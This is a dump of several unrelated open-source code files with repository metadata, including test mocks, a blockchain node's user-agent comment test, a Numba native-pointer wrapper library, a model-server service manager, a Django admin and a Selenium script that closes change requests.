4ead44aa254a84109ac8019f5d386e3adb75ac26
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils/platform_config.py
|
gyshi/intel-models
|
4ead44aa254a84109ac8019f5d386e3adb75ac26
|
[
"Apache-2.0"
] | 1
|
2019-09-11T21:41:51.000Z
|
2019-09-11T21:41:51.000Z
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: EPL-2.0
#
# Constants used for test mocks
SYSTEM_TYPE = "Linux"
LSCPU_PATH = "/usr/bin/lscpu"
LSCPU_OUTPUT = ("Architecture: x86_64\n"
"CPU(s): 112\n"
"Thread(s) per core: 2\n"
"Core(s) per socket: 28\n"
"Socket(s): 2\n"
"NUMA node(s): 2\n")
def set_mock_system_type(mock_platform):
"""
Sets the system type return value to Linux, which is currently the only
supported system type.
"""
mock_platform.system.return_value = SYSTEM_TYPE
def set_mock_os_access(mock_os):
"""
Sets the os.access return value to True
"""
mock_os.access.return_value = True
def set_mock_lscpu_subprocess_values(mock_subprocess):
"""
Sets mock return values for two subprocess calls that are made in
platform_util, which returns the lscpu path and the lscpu output.
"""
mock_subprocess.check_output.side_effect = [LSCPU_PATH,
LSCPU_OUTPUT]
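# Illustrative use in a test (the "platform_util" module path and mock wiring
# are assumptions based on the docstrings above):
# with mock.patch("platform_util.platform") as mock_platform, \
#         mock.patch("platform_util.subprocess") as mock_subprocess:
#     set_mock_system_type(mock_platform)
#     set_mock_lscpu_subprocess_values(mock_subprocess)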
| 31.444444
| 75
| 0.646643
|
bc6ea7bfcc05e7da8c0d49faf5a100f270c66cbc
| 1,531
|
py
|
Python
|
test/functional/uacomment.py
|
wolfoxonly/bwb
|
aae01441cdc171ff7bbdc161b74b4eeb2f1b5a10
|
[
"MIT"
] | null | null | null |
test/functional/uacomment.py
|
wolfoxonly/bwb
|
aae01441cdc171ff7bbdc161b74b4eeb2f1b5a10
|
[
"MIT"
] | null | null | null |
test/functional/uacomment.py
|
wolfoxonly/bwb
|
aae01441cdc171ff7bbdc161b74b4eeb2f1b5a10
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bwbcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -uacomment option."""
from test_framework.test_framework import BwbcoinTestFramework
from test_framework.util import assert_equal
class UacommentTest(BwbcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
self.log.info("test multiple -uacomment")
test_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-12:-1]
assert_equal(test_uacomment, "(testnode0)")
self.restart_node(0, ["-uacomment=foo"])
foo_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-17:-1]
assert_equal(foo_uacomment, "(testnode0; foo)")
self.log.info("test -uacomment max length")
self.stop_node(0)
expected = "Total length of network version string (286) exceeds maximum length (256). Reduce the number or size of uacomments."
self.assert_start_raises_init_error(0, ["-uacomment=" + 'a' * 256], expected)
self.log.info("test -uacomment unsafe characters")
for unsafe_char in ['/', ':', '(', ')']:
expected = "User Agent comment (" + unsafe_char + ") contains unsafe characters"
self.assert_start_raises_init_error(0, ["-uacomment=" + unsafe_char], expected)
if __name__ == '__main__':
UacommentTest().main()
| 42.527778
| 136
| 0.683867
|
bdb4e4c89709f2142cd263c8f4920c6c78de9e69
| 1,022
|
py
|
Python
|
bcs-ui/backend/resources/workloads/replicaset/formatter.py
|
kayinli/bk-bcs
|
93a0856175f7b066ef835921572c1cac590dbd8e
|
[
"Apache-2.0"
] | 1
|
2021-11-16T08:15:13.000Z
|
2021-11-16T08:15:13.000Z
|
bcs-ui/backend/resources/workloads/replicaset/formatter.py
|
kayinli/bk-bcs
|
93a0856175f7b066ef835921572c1cac590dbd8e
|
[
"Apache-2.0"
] | null | null | null |
bcs-ui/backend/resources/workloads/replicaset/formatter.py
|
kayinli/bk-bcs
|
93a0856175f7b066ef835921572c1cac590dbd8e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from typing import Dict
from backend.resources.workloads.common.formatter import WorkloadFormatter
class ReplicaSetFormatter(WorkloadFormatter):
"""ReplicaSet 格式化"""
def format_dict(self, resource_dict: Dict) -> Dict:
return self.format_common_dict(resource_dict)
| 40.88
| 115
| 0.780822
|
c216aca0723d8afa7f5e3007e3cb895fcc2dd043
| 5,464
|
py
|
Python
|
mms/service_manager.py
|
abhinavs95/mxnet-model-server
|
901c1a9a2def8373cd9a91c8d2f47248eed281cc
|
[
"Apache-2.0"
] | 1
|
2019-01-10T20:56:25.000Z
|
2019-01-10T20:56:25.000Z
|
mms/service_manager.py
|
frankfliu/mxnet-model-server
|
ce36c9e35efc17efe0fb79bb7019bdf3593131a5
|
[
"Apache-2.0"
] | null | null | null |
mms/service_manager.py
|
frankfliu/mxnet-model-server
|
ce36c9e35efc17efe0fb79bb7019bdf3593131a5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
# http://www.apache.org/licenses/LICENSE-2.0
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
This module manages model-services
"""
import inspect
import mms.model_service.mxnet_model_service as mxnet_model_service
from mms.model_service.model_service import load_service
from mms.model_service.mxnet_model_service import SingleNodeService
from mms.storage import KVStorage
class ServiceManager(object):
"""ServiceManager is responsible for storing information and managing
model services. ServiceManager calls model services directly.
In later phase, ServiceManager will also be responsible for model versioning,
prediction batching and caching.
"""
def __init__(self):
"""
Initialize Service Manager.
"""
# registry for model definition and user defined functions
self.modelservice_registry = KVStorage('modelservice')
self.func_registry = KVStorage('func')
# loaded model services
self.loaded_modelservices = KVStorage('loaded_modelservices')
def get_modelservices_registry(self, modelservice_names=None):
"""
Get all registered Model Service Class Definitions in a dictionary
from the internal registry, according to a name or list of names.
If nothing is passed, all registered model services will be returned.
Parameters
----------
modelservice_names : List, optional
Names to retrieve registered model services.
Returns
----------
Dict of name, model service pairs
Registered model services according to given names.
"""
if modelservice_names is None:
return self.modelservice_registry
return {
modelservice_name: self.modelservice_registry[modelservice_name]
for modelservice_name in modelservice_names
}
def add_modelservice_to_registry(self, modelservice_name, ModelServiceClassDef):
"""
Add a model service to internal registry.
Parameters
----------
modelservice_name : string
Model service name to be added.
ModelServiceClassDef: python class
Model Service Class Definition which can initialize a model service.
"""
self.modelservice_registry[modelservice_name] = ModelServiceClassDef
def get_loaded_modelservices(self, modelservice_names=None):
"""
Get all model services that are loaded in the system into a dictionary,
according to a name or list of names.
If nothing is passed, all loaded model services will be returned.
Parameters
----------
modelservice_names : List, optional
Model service names to retrieve loaded model services.
Returns
----------
Dict of name, model service pairs
Loaded model services according to given names.
"""
if modelservice_names is None:
return self.loaded_modelservices
return {
modelservice_name: self.loaded_modelservices[modelservice_name]
for modelservice_name in modelservice_names
}
def load_model(self, service_name, model_name, model_path, manifest, ModelServiceClassDef, gpu=None):
"""
Load a single model into a model service by using a
user-passed Model Service Class Definition.
Parameters
----------
service_name : string
Service name
model_name : string
Model name
        model_path : string
            Model path, which can be a URL or a local file path.
manifest: string
Model manifest
ModelServiceClassDef: python class
Model Service Class Definition which can initialize a model service.
gpu : int
            ID of the GPU device; if the machine has two GPUs, this number can be 0 or 1.
            If it is not set, the CPU will be used.
"""
self.loaded_modelservices[service_name] = ModelServiceClassDef(model_name, model_path, manifest, gpu)
def parse_modelservices_from_module(self, service_file):
"""
        Parse a user-defined module to get all model service classes in it.
Parameters
----------
        service_file : User-defined module file path
            A Python module which will be parsed by the given name.
Returns
----------
List of model service class definitions.
Those parsed python class can be used to initialize model service.
"""
module = load_service(service_file) if service_file else mxnet_model_service
# Parsing the module to get all defined classes
classes = [cls[1] for cls in inspect.getmembers(module, inspect.isclass)]
# Check if class is subclass of base ModelService class
# pylint: disable=deprecated-lambda
return list(filter(lambda cls: issubclass(cls, SingleNodeService), classes))
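
# A minimal usage sketch, assuming an mms installation. Passing None to
# parse_modelservices_from_module falls back to the built-in MXNet model
# services; the printed names depend on the installed version.
if __name__ == "__main__":
    manager = ServiceManager()
    # Discover model service classes and register each by its class name.
    classes = manager.parse_modelservices_from_module(None)
    for cls in classes:
        manager.add_modelservice_to_registry(cls.__name__, cls)
    registered = manager.get_modelservices_registry([c.__name__ for c in classes])
    print(sorted(registered))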
| 37.682759
| 109
| 0.66929
|
e99018f7dadaf760a95e8a24fec67c5bd58d11ef
| 12,338
|
py
|
Python
|
python/katana/native_interfacing/wrappers.py
|
origandrew/katana
|
456d64cf48a9d474dc35fb17e4d841bfa7a2f383
|
[
"BSD-3-Clause"
] | null | null | null |
python/katana/native_interfacing/wrappers.py
|
origandrew/katana
|
456d64cf48a9d474dc35fb17e4d841bfa7a2f383
|
[
"BSD-3-Clause"
] | null | null | null |
python/katana/native_interfacing/wrappers.py
|
origandrew/katana
|
456d64cf48a9d474dc35fb17e4d841bfa7a2f383
|
[
"BSD-3-Clause"
] | 1
|
2021-08-18T08:46:05.000Z
|
2021-08-18T08:46:05.000Z
|
import ctypes
import logging
from abc import ABCMeta, abstractmethod
from functools import lru_cache
from typing import Optional, Sequence, Union
import numba.core.ccallback
import numba.types
import numpy as np
from llvmlite import ir
from numba import from_dtype
from numba.core import cgutils, imputils
from numba.core.base import BaseContext
from numba.extending import (
NativeValue,
get_cython_function_address,
lower_builtin,
make_attribute_wrapper,
models,
overload_method,
register_model,
type_callable,
typeof_impl,
unbox,
)
from katana.native_interfacing.template_type import find_size_for_dtype
from . import exec_in_file, wraps_class
_logger = logging.getLogger(__name__)
def get_cython_function_address_with_defaults(full_function_name, default_module_name, default_function_name):
module_name = None
function_name = None
if full_function_name:
i = full_function_name.rfind(".")
if i >= 0:
module_name = full_function_name[:i]
function_name = full_function_name[i + 1 :]
else:
function_name = full_function_name
return get_cython_function_address(module_name or default_module_name, function_name or default_function_name)
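
# A hedged illustration of the name-resolution rule above, using hypothetical
# names: a dotted name overrides both defaults, while a bare name overrides
# only the function part. The helper below exists only for this sketch.
def _split_full_name(full_function_name):
    i = full_function_name.rfind(".")
    if i >= 0:
        return full_function_name[:i], full_function_name[i + 1 :]
    return None, full_function_name

assert _split_full_name("pkg._impl.Graph_get_address") == ("pkg._impl", "Graph_get_address")
assert _split_full_name("Graph_get_address") == (None, "Graph_get_address")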
class NumbaPointerWrapper(metaclass=ABCMeta):
"""
A collection of methods to configure Numba to correctly handle an extension type that can provide a raw pointer
to some underlying native object.
This class is used from Numba wrappers in pybind11 and Cython.
"""
def __init__(self, orig_typ, override_module_name=None):
_logger.debug("NumbaPointerWrapper: %r, %r", orig_typ, override_module_name)
Type = self._build_typing(orig_typ)
self._build_model(Type)
self.Type = Type
self.type_name = orig_typ.__name__
self.module_name = orig_typ.__module__
self.override_module_name = override_module_name or self.module_name
self.orig_type = orig_typ
def _build_model(self, Type):
# pylint: disable=unused-variable
@register_model(Type)
class Model(models.StructModel):
def __init__(self, dmm, fe_type):
members = [("ptr", numba.types.voidptr)]
models.StructModel.__init__(self, dmm, fe_type, members)
make_attribute_wrapper(Type, "ptr", "ptr")
@imputils.lower_constant(Type)
def constant(context, builder, ty, pyval):
# pylint: disable=unused-argument
ptr = ir.Constant(ir.IntType(64), self.get_value_address(pyval)).inttoptr(ir.PointerType(ir.IntType(8)))
ret = ir.Constant.literal_struct((ptr,))
return ret
def _build_typing(self, orig_typ):
@wraps_class(orig_typ, "<numba type>")
class Type(numba.types.Type):
def __init__(self):
super().__init__(name=orig_typ.__name__)
@typeof_impl.register(orig_typ)
def typeof(val, c):
# pylint: disable=unused-argument
return Type()
return Type
def register_method(
self,
func_name: str,
typ,
cython_func_name: Optional[str] = None,
addr: Optional[int] = None,
dtype_arguments: Optional[Sequence[bool]] = None,
data: Optional[int] = None,
):
"""
        Add a Numba-callable method to the type represented by self.
This is called from `katana.native_interfacing.numba_support.register_method`.
:param func_name: The name of the method.
:param typ: The type of the method, with :py:data:`~ctypes.c_void_p` used for object pointers.
:type typ: `ctypes` type
:param cython_func_name: Deprecated. Used for Cython sanity checks.
:param addr: The address of the function implementing the method. It must have a type matching ``typ``.
:param dtype_arguments: A sequence of `bool` specifying if each argument's type is defined by the dtype
associated with the runtime value.
:param data: An opaque value passed to the implementation (``addr``) as the first argument.
"""
addr_found = None
if cython_func_name:
addr_found = get_cython_function_address_with_defaults(
cython_func_name, self.override_module_name, self.type_name + "_" + func_name,
)
if addr and addr_found:
assert addr == addr_found
func = typ(addr or addr_found)
if dtype_arguments is None:
dtype_arguments = [False] * (len(func.argtypes) - 1 - (1 if data is not None else 0))
        # addr_found may be None when an explicit addr is given, so log it with %r.
        _logger.debug(
            "%r.register_method: %r, %r: %r%r, %r, %r",
self,
func_name,
func,
func.restype,
func.argtypes,
addr_found,
cython_func_name,
)
exec_glbls = dict(
self=self,
func_name=func_name,
func=func,
overload_method=overload_method,
construct_dtype_on_stack=construct_dtype_on_stack,
)
arguments = ", ".join(f"arg{i}" for i, _ in enumerate(dtype_arguments))
arguments_construct = ", ".join(
f"construct_dtype_on_stack(self, arg{i})" if is_dtype else f"arg{i}"
for i, is_dtype in enumerate(dtype_arguments)
)
src = f"""
@overload_method(self.Type, func_name)
def overload(self, {arguments}):
def impl(self, {arguments}):
return func({data}, self.ptr, {arguments_construct})
return impl
"""
if data is None:
src = f"""
@overload_method(self.Type, func_name)
def overload(self, {arguments}):
def impl(self, {arguments}):
return func(self.ptr, {arguments_construct})
return impl
"""
exec_in_file(f"{self.type_name}_{id(self)}_overload_{func_name}", src, exec_glbls)
return exec_glbls["overload"]
@abstractmethod
def get_value_address(self, pyval):
raise NotImplementedError()
def __repr__(self):
return "<{} {} {}>".format(type(self).__name__, self.orig_type, self.Type)
class SimpleNumbaPointerWrapper(NumbaPointerWrapper):
def __init__(self, orig_typ, override_module_name=None):
assert (
hasattr(orig_typ, "__katana_address__")
and hasattr(orig_typ.__katana_address__, "__get__")
and not hasattr(orig_typ.__katana_address__, "__call__")
), "{}.__katana_address__ does not exist or is not a property.".format(orig_typ)
super().__init__(orig_typ, override_module_name)
@unbox(self.Type)
def unbox_func(typ, obj, c):
ptr_obj = c.pyapi.object_getattr_string(obj, "__katana_address__")
ctx = cgutils.create_struct_proxy(typ)(c.context, c.builder)
ctx.ptr = c.pyapi.long_as_voidptr(ptr_obj)
c.pyapi.decref(ptr_obj)
is_error = cgutils.is_not_null(c.builder, c.pyapi.err_occurred())
return NativeValue(ctx._getvalue(), is_error=is_error)
def get_value_address(self, pyval):
return pyval.__katana_address__
class DtypeParametricType(numba.types.Type):
def __init__(self, name, dtype):
super().__init__(name=name)
if not isinstance(dtype, np.dtype):
raise TypeError("dtype must be a dtype: " + str(dtype))
self.dtype = dtype
@property
def key(self):
return self.name, self.dtype
@property
def mangling_args(self):
typ = self.dtype_as_type()
if isinstance(typ, numba.types.Record):
return self.name, tuple(t for _, t in typ.members)
return self.name, (typ,)
@lru_cache(1)
def dtype_as_type(self) -> Union[numba.types.Record, numba.types.Type]:
return from_dtype(self.dtype)
class DtypeNumbaPointerWrapper(SimpleNumbaPointerWrapper):
def __init__(self, orig_typ, override_module_name=None):
super().__init__(orig_typ, override_module_name)
# TODO: Is there a way to check for ".dtype"? Probably not, it's an attribute and we don't have an instance.
def _build_typing(self, orig_typ):
@wraps_class(orig_typ, "<numba type>")
class Type(DtypeParametricType):
def __init__(self, dtype):
super().__init__(dtype=dtype, name=orig_typ.__name__)
@typeof_impl.register(orig_typ)
def typeof_func(val, c):
_ = c
return Type(val.dtype)
return Type
class NativeNumbaPointerWrapper(NumbaPointerWrapper):
def __init__(self, orig_typ, addr_func, addr_func_name=None, override_module_name=None):
super().__init__(orig_typ, override_module_name)
self.addr_func = self._build_unbox_by_call(addr_func, addr_func_name)
def _build_unbox_by_call(self, addr_func, addr_func_name):
try:
addr_func_c = get_cython_function_address_with_defaults(
addr_func_name, self.override_module_name, self.type_name + "_get_address",
)
except ValueError:
addr_func_c = get_cython_function_address_with_defaults(
addr_func_name, self.override_module_name, self.type_name + "_get_address_c",
)
@unbox(self.Type)
def unbox_type(typ, obj, c):
ctx = cgutils.create_struct_proxy(typ)(c.context, c.builder)
ctx.ptr = call_raw_function_pointer(
addr_func_c,
ir.FunctionType(ir.PointerType(ir.IntType(8)), (ir.PointerType(ir.IntType(8)),)),
(obj,),
c.builder,
)
return NativeValue(ctx._getvalue())
return addr_func
def get_value_address(self, pyval):
return self.addr_func(pyval)
def construct_dtype_on_stack(self, values):
"""
    (Numba-compiled code only) Return a stack-allocated instance of self.dtype
    (self must be a DtypeParametricType) with the field values taken from the tuple `values`.
"""
raise RuntimeError("Not callable from Python")
@type_callable(construct_dtype_on_stack)
def type_construct_dtype_on_stack(context):
# pylint: disable=unused-argument
def typer(self, values):
if isinstance(self, DtypeParametricType) and isinstance(values, numba.types.BaseTuple):
return numba.types.voidptr
return None
return typer
@lower_builtin(construct_dtype_on_stack, DtypeParametricType, numba.types.BaseTuple)
def impl_construct_dtype_on_stack(context: BaseContext, builder: ir.IRBuilder, sig, args):
ty = sig.args[0].dtype_as_type()
containing_size = find_size_for_dtype(sig.args[0].dtype)
ptr = builder.alloca(ir.IntType(8), containing_size)
for i, (name, mem_ty) in enumerate(ty.members):
llvm_mem_ty = context.get_value_type(mem_ty)
offset = ty.offset(name)
v = builder.extract_value(args[1], i)
v = context.cast(builder, v, sig.args[1][i], mem_ty)
v_ptr_byte = builder.gep(ptr, (ir.Constant(ir.IntType(32), offset),), True)
v_ptr = builder.bitcast(v_ptr_byte, llvm_mem_ty.as_pointer())
builder.store(v, v_ptr)
return ptr
def call_raw_function_pointer(func_ptr, function_type, args, builder: ir.IRBuilder):
val = ir.Constant(ir.IntType(64), func_ptr)
ptr = builder.inttoptr(val, ir.PointerType(function_type))
    # Due to limitations in llvmlite, ptr cannot be a constant, so perform the
    # cast as an instruction so that the call argument is itself an instruction.
return builder.call(ptr, args)
def interpret_numba_wrapper_tables(tables, global_vars=None, override_module_name=None):
for typ, with_dtype, table in tables:
if with_dtype:
Type = DtypeNumbaPointerWrapper(typ, override_module_name=override_module_name)
else:
Type = SimpleNumbaPointerWrapper(typ, override_module_name=override_module_name)
interpret_numba_wrapper_table(Type, table)
if global_vars:
global_vars[typ.__name__ + "_numba_wrapper"] = Type
global_vars[typ.__name__ + "_numba_type"] = Type.Type
def interpret_numba_wrapper_table(Type, table):
for name, func_type, impl_func_name, addr, dtype_arguments in table:
Type.register_method(name, func_type, impl_func_name, addr=addr, dtype_arguments=dtype_arguments)
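
# A hedged usage sketch: "Counter" and "_counter_get" below are hypothetical
# stand-ins for a real wrapped native object and its compiled accessor. The
# definitions run as written; whether the final njit call compiles also
# depends on the installed Numba version.
class Counter:
    """Toy object exposing a raw address, as SimpleNumbaPointerWrapper expects."""

    def __init__(self):
        self._value = ctypes.c_int64(42)

    @property
    def __katana_address__(self):
        return ctypes.addressof(self._value)

# A C-callable implementation taking the object pointer as its only argument.
_GET_SIG = ctypes.CFUNCTYPE(ctypes.c_int64, ctypes.c_void_p)

@_GET_SIG
def _counter_get(ptr):
    return ctypes.cast(ptr, ctypes.POINTER(ctypes.c_int64)).contents.value

_counter_wrapper = SimpleNumbaPointerWrapper(Counter)
_counter_wrapper.register_method(
    "get", _GET_SIG, addr=ctypes.cast(_counter_get, ctypes.c_void_p).value
)

@numba.njit
def _read_counter(c):
    return c.get()  # dispatches through the address registered above

# _read_counter(Counter()) would be expected to return 42.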
| 36.94012
| 119
| 0.66437
|
6f1d734696420c0e7e42d7ff50942a6eaf14fe3a
| 777
|
py
|
Python
|
app/core_app/admin.py
|
ruhankhandakar/recipe-app-api
|
55eb2109b0e91d6bb193a1745ea6cdde3ac43e01
|
[
"MIT"
] | null | null | null |
app/core_app/admin.py
|
ruhankhandakar/recipe-app-api
|
55eb2109b0e91d6bb193a1745ea6cdde3ac43e01
|
[
"MIT"
] | null | null | null |
app/core_app/admin.py
|
ruhankhandakar/recipe-app-api
|
55eb2109b0e91d6bb193a1745ea6cdde3ac43e01
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.utils.translation import gettext as _
from .models import User
# Register your models here.
class UserAdmin(BaseUserAdmin):
ordering = ['id']
list_display = ['email', 'name']
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Personal Info'), {'fields': ('name',)}),
(
_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}
),
(_('Important dates'), {'fields': ('last_login',)})
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2')
}),
)
admin.site.register(User, UserAdmin)
| 26.793103
| 83
| 0.574003
|
2084bc1be844798ed223843e0f82bbaa2ed7ff69
| 6,461
|
py
|
Python
|
combiners/close.py
|
masudul-hasan/autobot
|
2fbbb954b6583a44935f303e042dd5cf1b349cc7
|
[
"MIT"
] | null | null | null |
combiners/close.py
|
masudul-hasan/autobot
|
2fbbb954b6583a44935f303e042dd5cf1b349cc7
|
[
"MIT"
] | null | null | null |
combiners/close.py
|
masudul-hasan/autobot
|
2fbbb954b6583a44935f303e042dd5cf1b349cc7
|
[
"MIT"
] | null | null | null |
from rich.live import Live
from selenium.webdriver.chrome.webdriver import WebDriver
from pages.base import BasePage
from pages.closerequest import CloseRequests
from pages.createrequest import CreateRequests
from pages.home import HomePage
from pages.login import LoginPage
from prettify.close_prettifier import ClosePrettify
from utilites import make_data
from utilites.static_data import StaticData
class Close(BasePage):
def __init__(self, driver: WebDriver):
""" Close NCR E2E Actions """
super().__init__(driver)
self.login_page = LoginPage(self._driver)
self.home_page = HomePage(self._driver)
self.close_requests = CloseRequests(self._driver)
self.create_requests = CreateRequests(self.close_requests._driver)
def closeRequest(self):
# Login to the Page
self.login_page.enter_username_textbox()
self.login_page.enter_password_textbox()
self.login_page.click_login_button()
        # Parse all the change numbers from the home page
all_changes_list = self.home_page.get_all_change_numbers()
        # Parse all the closing change requests shared by the user
user_list_for_close = make_data.list_of_change(StaticData.CLOSE_CHANGE_TXT_FILE_PATH)
tasks = len(user_list_for_close)
ClosePrettify.make_layout()
ClosePrettify.make_table()
my_progress = ClosePrettify.progress_bar(tasks)
ClosePrettify.merge_layout(my_progress, ClosePrettify.get_table())
# Iterate through each user shared Change Number
with Live(ClosePrettify.get_layout(), refresh_per_second=5, vertical_overflow="visible") as live:
for job in my_progress.tasks:
for _index, a_change in enumerate(user_list_for_close):
if a_change in all_changes_list:
                        # get the index for the change, as computed by get_index_for_change_number()
index = self.close_requests.get_index_for_change_number(a_change, all_changes_list)
if index is not None:
# Select the change request shared by user
self.close_requests.find_the_change_request(a_change, index)
if not self.close_requests.is_change_status_closed():
# check if Change is opened
if not self.close_requests.is_status_scheduled_for_approval():
# check if Change is Scheduled for approval
actual_open_time = self.close_requests.get_actual_start_date()
if actual_open_time is not None:
# make closing time depending on Actual Open Time
# actual_closing_time = make_data.make_downtime_from_open_time(
# actual_open_time)
# Grab the current sys time
current_sys_time = make_data.get_current_system_time()
self.close_requests.goto_task_page()
# Close the 2nd task
self.close_requests.close_service_downtime_duration_task(actual_open_time)
# Close the 3rd task
self.close_requests.close_service_downtime_window_task(actual_open_time,
current_sys_time)
# Close the 4th task
self.close_requests.close_system_downtime_duration_task(actual_open_time)
self.create_requests.go_back_to_homepage()
ClosePrettify.add_row_table(str(_index + 1),
self.close_requests.get_change_number(),
"[green]SUCCESS")
live.update(ClosePrettify.get_layout())
else:
self.close_requests.add_change_to_invalid_list(a_change)
self.create_requests.go_back_to_homepage()
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(),
"[red]NCR NOT OPENED")
live.update(ClosePrettify.get_layout())
else:
self.close_requests.add_change_to_invalid_list(a_change)
self.create_requests.go_back_to_homepage()
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(), "[red]SFA")
live.update(ClosePrettify.get_layout())
else:
self.create_requests.go_back_to_homepage()
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(), "[red]AC")
live.update(ClosePrettify.get_layout())
else:
self.close_requests.add_change_to_invalid_list(a_change)
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(), "[red]INVALID")
live.update(ClosePrettify.get_layout())
else:
self.close_requests.add_change_to_invalid_list(a_change)
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(), "[red]INVALID")
live.update(ClosePrettify.get_layout())
if not job.finished:
my_progress.advance(job.id)
self.home_page.click_logout_button()
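
# A hedged entry-point sketch: the Chrome driver setup below is illustrative
# and assumes a chromedriver binary on PATH; the original project may wire
# the driver up elsewhere.
if __name__ == "__main__":
    from selenium import webdriver

    driver = webdriver.Chrome()
    try:
        Close(driver).closeRequest()
    finally:
        driver.quit()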
| 62.125
| 114
| 0.532271
|